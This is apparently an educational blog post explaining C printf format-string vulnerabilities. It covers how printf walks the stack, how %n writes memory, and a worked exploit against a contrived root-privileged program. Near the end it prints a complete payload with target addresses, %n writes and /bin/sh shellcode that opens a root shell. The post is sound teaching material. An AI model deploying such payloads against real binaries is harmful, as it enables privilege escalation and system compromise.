String Format Vulnerabilities: The Epic of printf

software

October 15 2023

Did you know simply printing can be a major security vulnerability?

Important details aside, ever since 1989 it's been known that you can compromise a binary simply by exploiting the fact that it prints!

- "Wow, cool fact m8"

Introducing printf

The crux of the problem comes down to the C programming language's printf suite of functions. printf and its friends are functions that format strings of text and print them.

// introduction.c
#include <stdio.h>

int main(int argc, char **argv) {
    printf("Hello %s %s!\n", argv[1], argv[2]);
    return 0;
}

gcc introduction.c -o introduction && ./introduction 'John' 'Doe'
# Hello John Doe!

Formatted printing functions such as printf (print to stdout), fprintf (print to a file or to a stream such as stderr), and sprintf (print to a buffer) take in a format string and a list of arguments.

In our example, "Hello %s %s!\n" is the format string, and argv[1] and argv[2] are our arguments. The two %ss are format specifiers. A format specifier is a symbol that says "replace me with an argument in the formatted output."

The %s format specifier expects a string of characters as an argument, but other format specifiers expect other things. %d, for instance, expects a signed integer and prints it in decimal, and %x expects an unsigned integer and prints it in hexadecimal.

When the printing function runs, it will go through the format string you provide and replace each format specifier with the associated argument you provide.

You can imagine the process looking something like this.

// ./introduction John Doe
printf("Hello %s %s!\n", argv[1], argv[2]);
printf("Hello John %s!\n", argv[2]);         // replace the first %s with argv[1]
printf("Hello John Doe!\n");                 // replace the second %s with argv[2]
// stdout: Hello John Doe!
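
To make that process concrete, here is a minimal sketch of a toy formatter. It is not how any real C library implements printf; mini_format is a hypothetical name, it only understands %s and %d, and it writes into a caller-supplied buffer. Notice that it simply trusts the format string about how many arguments there are and what type each one has.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical toy formatter (not the real printf): understands %s and %d,
 * copies everything else verbatim, and never writes more than cap bytes.
 * Returns the length of the resulting string. */
size_t mini_format(char *out, size_t cap, const char *fmt, ...) {
    va_list args;
    size_t len = 0;

    if (cap == 0) return 0;
    va_start(args, fmt);
    for (const char *p = fmt; *p != '\0' && len + 1 < cap; p++) {
        if (p[0] == '%' && p[1] == 's') {
            /* Trust the format string: assume the next argument is a string. */
            const char *s = va_arg(args, const char *);
            while (*s != '\0' && len + 1 < cap) out[len++] = *s++;
            p++;
        } else if (p[0] == '%' && p[1] == 'd') {
            /* Trust the format string: assume the next argument is an int. */
            int n = snprintf(out + len, cap - len, "%d", va_arg(args, int));
            if (n < 0) break;
            len += ((size_t)n < cap - len) ? (size_t)n : cap - len - 1;
            p++;
        } else {
            out[len++] = *p; /* ordinary character: copy it as-is */
        }
    }
    va_end(args);
    out[len] = '\0';
    return len;
}
```

Calling mini_format(buf, sizeof buf, "Hello %s %s!\n", "John", "Doe") fills buf with "Hello John Doe!\n". Nothing in the loop ever checks that an argument was actually passed for each specifier.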

These functions are super useful for debugging, writing to files, and filling buffers, and are found in a significant number of C and C++ projects.

Now, why are they dangerous and what can go wrong?

zzzprintf 😴

The problem is that they're lazy.

If you, dear reader, were implementing and testing such a function, what are some behaviors you might check?

What happens when...

The argument provided to a format specifier is different than the type it expects?
You provide no format specifiers?
There are more arguments than format specifiers?
There are more format specifiers than arguments?

Consider:

printf("Date: %d-%d-%d\n", year, month);

You might notice that we have three %d format specifiers in the format string but only two arguments; perhaps we forgot the last one. There are fewer arguments than format specifiers.

You might imagine that your AAA implementation of printf would do some checking, notice that 2 != 3, and throw an error.
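
The counting half of that imagined check could be sketched like this. count_specifiers is a hypothetical helper, not part of the C library, and it is deliberately simplified: it treats every % that isn't part of "%%" as one specifier and ignores flags, widths, and length modifiers. The other half of the check, the number of arguments actually passed, is something a C variadic function is never told.

```c
#include <stddef.h>

/* Hypothetical helper: count the conversion specifiers in a format string.
 * Simplification: any '%' not followed by another '%' counts as one. */
size_t count_specifiers(const char *fmt) {
    size_t count = 0;
    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%') continue;
        p++;                      /* look at the character after '%' */
        if (*p == '\0') break;    /* a lone '%' at the very end */
        if (*p != '%') count++;   /* "%%" is a literal percent sign */
    }
    return count;
}
```

For "Date: %d-%d-%d\n" this returns 3, which is the number we'd want to compare against the two arguments supplied.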

The sad reality, my friends, is that printf does no such thing...

So what does that mean? To find out, we'll have to delve a little deeper into how these formatting functions work.

How printf works

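In C, under stack-based calling conventions such as 32-bit x86's cdecl, when a function is called the arguments to the function are put on the stack. (Many 64-bit conventions pass the first few arguments in registers instead, but the stack picture is the easiest one to follow.)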

printf("Date: %d-%d-%d\n", year, month);

Stack (higher memory addresses)
0xf5ff -------- [data]
0xf4ff -------- [data]
0xf3ff -------- [data]
0xf2ff -------- month
0xf1ff -------- year
0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

We say the arguments are pushed in "reverse order" because the later arguments (e.g. month) are at higher addresses in the stack than the earlier arguments (e.g. year).

One reason for this is so that when evaluating a function, later arguments are at larger offsets from the "base pointer", which tends to be more intuitive. So, for example, given a call foo(arg1, arg2) you might have stack[base + 1] = arg1 and stack[base + 2] = arg2.

printf will traverse the format string and each time it encounters a format specifier it will replace the specifier with the data at its current stack pointer and increase the pointer by the argument's size.

// "Date: {year}-%d-%d\n"
Stack (higher memory addresses)
            0xf5ff -------- [data]
            0xf4ff -------- [data]
            0xf3ff -------- [data]
            0xf2ff -------- month
pointer --> 0xf1ff -------- year
            0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

// "Date: {year}-{month}-%d\n"
Stack (higher memory addresses)
            0xf5ff -------- [data]
            0xf4ff -------- [data]
            0xf3ff -------- [data]
pointer --> 0xf2ff -------- month
            0xf1ff -------- year
            0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

When it encounters the third %d, it doesn't discriminate. It does the same thing, reading the data found at the pointer and formatting it as a decimal value.

// "Date: {year}-{month}-{[data]} \n"
Stack (higher memory addresses)
            0xf5ff -------- [data]
            0xf4ff -------- [data]
pointer --> 0xf3ff -------- [data]
            0xf2ff -------- month
            0xf1ff -------- year
            0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

In other words, it will just format the data it finds and increase its stack pointer for every format specifier in the format string, irrespective of whether or not there's an associated argument.
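
Reading past the real arguments is undefined behavior, so rather than do it for real, here is a small simulation of the walk. Everything in it is an assumption made for illustration: simulate_printf is a hypothetical function, the slots array stands in for the stack, and only %d is handled.

```c
#include <stddef.h>
#include <stdio.h>

/* Simulated stack walk: every %d consumes the next slot, whether or not the
 * caller meant that slot to be an argument. Returns the number of slots read. */
size_t simulate_printf(char *out, size_t cap, const char *fmt,
                       const int *slots, size_t nslots) {
    size_t len = 0, cursor = 0;

    if (cap == 0) return 0;
    for (const char *p = fmt; *p != '\0' && len + 1 < cap; p++) {
        if (p[0] == '%' && p[1] == 'd' && cursor < nslots) {
            /* No check that this slot was ever passed as an argument. */
            int n = snprintf(out + len, cap - len, "%d", slots[cursor++]);
            if (n < 0) break;
            len += ((size_t)n < cap - len) ? (size_t)n : cap - len - 1;
            p++;
        } else {
            out[len++] = *p;
        }
    }
    out[len] = '\0';
    return cursor;
}
```

With slots holding {2023, 10, 1337, 42}, where only the first two are "real" arguments, the format "Date: %d-%d-%d\n" produces "Date: 2023-10-1337\n": the third %d happily prints the neighbouring data.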

You can imagine taking this to the extreme, with something like

printf("%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x");

which would print out a large portion of the stack frame, as hexadecimal values.

Reading the stack frame is certainly not something you want to allow. Imagine, for instance, that there is sensitive data on the stack like a password. Just because the program has access to some data doesn't mean that you want all the users of the program to have access. Though we're just getting started.

The shit really hits the fan when you introduce one last piece.

The cheeky %n

Specifier|Argument|Output
---------|--------|------
%s       |dog     |dog
%d       |10      |10
%x       |10      |a
%f       |10.0    |10.000000
%n       |0xffef  |*writes to 0xffef*

Being a contrarian, %n does not behave like the other format specifiers. It does not merely get replaced by the provided argument. Rather, it interprets the argument it receives as an address and then writes the number of characters that have been printed to that address.

In the example below,

int foo;
printf("four%n\n", &foo);
// four
printf("%d", foo);
// 4

when %n is reached the 4 characters "four" have been printed. Therefore, %n writes 4 to the provided address, &foo, the address of foo. This is equivalent to assigning 4 to foo.

In short, this means that printing can result in writing to memory. So, what could go wrong? Well, suppose you could control which address you write to. And, further, suppose you could control what value you write.

That's the equation for writing to arbitrary memory!
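
As for controlling the value: %n writes the number of characters printed so far, so one way to steer it is to pad the output with a field width. The sketch below shows the idea in a harmless setting; pad_then_count is a hypothetical helper, and note that some C libraries restrict or disable %n, so this assumes a libc that still honors it for a constant format string.

```c
#include <stdio.h>

/* Hypothetical helper: print one number padded to `width` characters, then
 * let %n report how many characters have been produced so far.
 * Returns that count, or -1 if the width doesn't fit the scratch buffer. */
int pad_then_count(unsigned width) {
    char out[256];
    int count = -1;

    if (width >= sizeof out) return -1;
    /* "%*u" takes the field width from the argument list. */
    snprintf(out, sizeof out, "%*u%n", (int)width, 7u, &count);
    return count;
}
```

pad_then_count(100) returns 100: the width, not the number being printed, decides what %n writes. An attacker does the same thing with a literal width baked into the format string.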

Example

Let's look at a full example of this to see it in action.

// contrived.c
#include <stdio.h>

int check_arguments(int argc, char **argv, char buffer[]) {
    if (argc != 3) {
        sprintf(buffer, "[%s] - invalid # of arguments", argv[0]);
        return 1;
    }

    return 0;
}

int main(int argc, char **argv) {
    char buffer[512];
    if (check_arguments(argc, argv, buffer) == 1) {
        printf(buffer);
        return 1;
    }
    printf("All checks out!\n");
    return 0;
}

gcc contrived.c -o contrived
./contrived one
# [./contrived] - invalid # of arguments
./contrived one two
# All checks out!

What's the vulnerability?

On line 6 we put the contents of argv[0] into buffer. Then on line 16 we print the contents of the buffer. Crucially, buffer is the format string itself and not an argument to the format string.

An attacker could put a malicious payload into argv[0]. Then on line 16 we'd have

printf("[<malicious payload from argv[0]>] - invalid # of arguments");

for example

printf("[%x%x%x%x%x] - invalid # of arguments");

which would print some of the contents of the stack frame.

Suppose, for instance, that this program is very important and runs with root privileges. Therefore, any code it executes will be executed with root privileges. So if we craft our payload correctly, we could potentially get arbitrary code executing with root privileges.

One example of something we might want to do with root privileges is open a shell, a root shell. With a root shell we could navigate the file system, delete or create files and folders, run malicious code, etc.

"Sounds snazzy!"

Crafting a Payload

Our final payload is going to look something like this

"<addresses><stackpop><write-code><nops><shellcode>"

We'll go through each part left to right and discuss its purpose and, broadly, how the exploit will work.

<addresses>

Remember our good friend %n? <addresses> will contain the addresses we'll have %n write to.

<stackpop>

How can we get %n to write to addresses inside of our payload? Well, remember how we explored how printf works and specifically how its internal pointer will keep moving up the stack as long as we keep providing format specifiers? Well, at some point up the stack is our buffer (the one from line 14).

<stackpop> is a bunch of %x format specifiers that will move printf's internal pointer up the stack until it reaches the start of buffer, which is conveniently where <addresses> are stored.
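
Generating that run of specifiers is simple enough to sketch. build_stackpop is a hypothetical helper; how many %x you actually need depends on the target's stack layout and is typically found by experimenting, so the count is left as a parameter.

```c
#include <stddef.h>

/* Hypothetical helper: fill `out` with `count` copies of "%x".
 * Returns the string length, or 0 if the buffer is too small. */
size_t build_stackpop(char *out, size_t cap, size_t count) {
    if (cap == 0) return 0;
    if (count > (cap - 1) / 2) {   /* each "%x" needs two bytes, plus '\0' */
        out[0] = '\0';
        return 0;
    }
    for (size_t i = 0; i < count; i++) {
        out[2 * i] = '%';
        out[2 * i + 1] = 'x';
    }
    out[2 * count] = '\0';
    return 2 * count;
}
```

For example, build_stackpop(buf, sizeof buf, 3) leaves "%x%x%x" in buf.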

<write-code>

Great, so now printf's internal pointer points to some address in <addresses>. Therefore, when printf encounters a %n, the address it will write to is an address we provided. So that's exactly what we do. <write-code> contains the %ns that will write to the addresses we provide.

"What address should we write to and what should be written there?"

When a function is called, a return address is saved. A return address is where execution should resume from when the function returns. By overwriting this address, which is stored on the stack, we can control what instructions are going to be executed when the function returns.

The location of a function's return address can typically be obtained using a tool like GDB. The <write-code> will overwrite the return address (whose location is stored in <addresses>) with an address inside of our <nops> (we'll get to why next).

<nops><shellcode>

<shellcode> is what we want to execute. It will open a shell, and since the vulnerable program has root privileges, it will be a root shell. The tricky thing is that we want to start execution from exactly the start of our shellcode.

shellcode = x
other     = y
RA        = updated return address

     (bad) RA    (good) RA      (bad) RA
           ▼            ▼             ▼
yyyyyyyyyyyyyyyyyyyyyyyyxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

If we start from anywhere else (even one byte off!), our program is likely going to fail. To make our lives easier, what we can do is pad the start of our code with <nops>. A NOP is a "do nothing" instruction. If we return into the <nops> (what is referred to as a NOP slide, or NOP sled) then the processor will execute the NOPs and then execute our shellcode.

shellcode = x
other     = y
NOP       = _
RA        = updated return address

       (good) RA
              ▼
yyyyyyyyyyyyy________xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

          (good) RA
                 ▼
yyyyyyyyyyyyy________xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

            (good) RA
                   ▼
yyyyyyyyyyyyy________xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

In all three cases above, our return address points into the NOP slide so the NOPs will be executed one by one and then the shellcode will run in full!
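
The diagrams can be turned into a tiny simulation. This is only a model: reaches_shellcode is a hypothetical function, memory is a plain byte array, and "executing" a NOP just means stepping over a 0x90 byte.

```c
#include <stdbool.h>
#include <stddef.h>

#define NOP 0x90

/* Model of the NOP slide: starting at `entry`, step over NOP bytes and report
 * whether we arrive exactly at the first byte of the shellcode. */
bool reaches_shellcode(const unsigned char *mem, size_t len,
                       size_t entry, size_t shellcode_start) {
    size_t pc = entry;

    while (pc < len && pc < shellcode_start && mem[pc] == NOP) {
        pc++; /* a NOP does nothing except advance to the next byte */
    }
    return shellcode_start < len && pc == shellcode_start;
}
```

With 13 bytes of other data, 8 NOPs, and then the shellcode at index 21, any entry from 13 through 21 reaches the shellcode, while an entry of 5 (in the other data) or 25 (mid-shellcode) does not.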

Using a tool like GDB we can get the address of buffer. Since our NOPs are at some offset inside of our buffer, we know that the address we want the <write-code> to write is the address of buffer plus some offset. The NOPs provide some margin for error when setting the offset.

Hence, all that remains to be done is to execute contrived with our malicious payload in argv[0]!

#include <unistd.h>

char *payload = "<addresses><stackpop><write-code><nops><shellcode>";
char *program = "/path/to/contrived";

int main() {
    char *args[2];
    args[0] = payload;
    args[1] = NULL;

    // "run <program> with <args>"
    execvp(program, args);
    return 0;
}

Recalling our vulnerable code, first buffer will be created and check_arguments will be called.

int check_arguments(int argc, char **argv, char buffer[]) {
    if (argc != 3) {
        // Write to the buffer.
        sprintf(buffer, "[%s] - invalid # of arguments", argv[0]);
        return 1;
    }

    return 0;
}

Since argc is not 3 (we pass only the payload, as argv[0]), argv[0] will be written into buffer. Subsequently, in main we'll see that check_arguments returned 1 and we'll print the buffer.

int main(int argc, char **argv) {
    char buffer[512];
    if (check_arguments(argc, argv, buffer) == 1) {
        // Print the buffer.
        printf(buffer);
        return 1;
    }
    printf("All checks out!\n");
    return 0;
}

The printf call, with our buffer written in full, will look like this:

printf("[<addresses><stackpop><write-code><nops><shellcode>] - invalid # of arguments");

<stackpop> will move printf's internal pointer to the start of buffer where <addresses> (the location of main's return address) is stored.
<write-code> will write our new return address, an offset into buffer where our NOPs are stored, into the address provided in <addresses>.
main will return and jump to the new return address we set, inside of our NOPs.
The NOPs will execute, our shellcode will execute, and a root shell will be opened!

If you want to learn more about crafting these payloads or different kinds of string format exploits, I highly recommend this great article!

If you're curious about what a real payload might look like, this is a payload I wrote for a recent assignment I completed.

static char payload[] = /* <addresses>  */"\x9c\xda\xbf\xff\x9c\xda\xbf\xff\x9e\xda\xbf\xff\x9e\xda\xbf\xff"
                        /* <stackpop>   */"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
                        /* <write-code> */"%54756u%n%10357u%n"
                        /* <nops>       */"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        /* <shellcode>  */"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

Conclusion

A few decades ago some developers decided to not implement checks for C's formatting functions. This, alongside the %n specifier, opened the floodgates for decades of exploits that leveraged this behavior.

In this post, we looked at the nature of string format vulnerabilities and an example exploit, whereby given a vulnerable program with root privileges, we crafted a malicious payload to create a root shell.

Although they still exist, string format vulnerabilities are far less prevalent than they previously were, as they're relatively easy to spot and protect against, in most cases. In fact, modern C and C++ compilers will typically warn you if you compile a program where user input is used as some part of a format string.
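
For the contrived program in this post, the protection can be as small as the sketch below: keep the format string constant and pass untrusted text as an argument. print_untrusted and format_error are hypothetical names for illustration. The second function also swaps sprintf for snprintf, since a very long argv[0] could otherwise overflow the 512-byte buffer. On the compiler side, GCC's -Wformat-security option is one way to get a warning about the printf(buffer) pattern.

```c
#include <stdio.h>

/* Vulnerable pattern from contrived.c:   printf(buffer);
 * Safer pattern: a constant format string, with the untrusted text as data. */
int print_untrusted(FILE *stream, const char *text) {
    return fprintf(stream, "%s", text);
}

/* Same idea when building the message: snprintf never writes past cap. */
int format_error(char *buffer, size_t cap, const char *program_name) {
    return snprintf(buffer, cap, "[%s] - invalid # of arguments", program_name);
}
```

With these, a program name of "%x%x%x%n" ends up printed literally as "[%x%x%x%n] - invalid # of arguments" instead of being interpreted as specifiers.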

TL;DR - printf is the kiss of death :)